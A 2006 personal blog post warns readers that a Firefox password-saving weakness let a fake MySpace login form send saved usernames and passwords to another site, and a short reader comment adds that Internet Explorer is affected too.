Wednesday, November 22, 2006

Yikes

I've got better things to do than hang out on Myspace but I know the same cannot be said for many of you. So be very careful out there if you're using Firefox as this vulnerability has just come out, with no fix as yet. It's so simple, it's genius. Websites like Myspace allow users to craft their own HTML into the webpage and this particular attack used a legitimate looking Myspace login form to steal your username and password - even though the form was getting posted to a completely different site.

There's the potential here for any website that allows users to craft pages with HTML. Not to mention the traditional phishing websites.

Personally I'm not going to stop letting Firefox save my passwords, but I shall be very careful until this is fixed.

I bet Microsoft are feeling pretty smug right now. Or maybe not...

1 comment:

bagelmouse said...

It also affects IE; though I suppose if you're still using IE you deserve everything that's coming to you.

Damn work and their obsession with uniformity.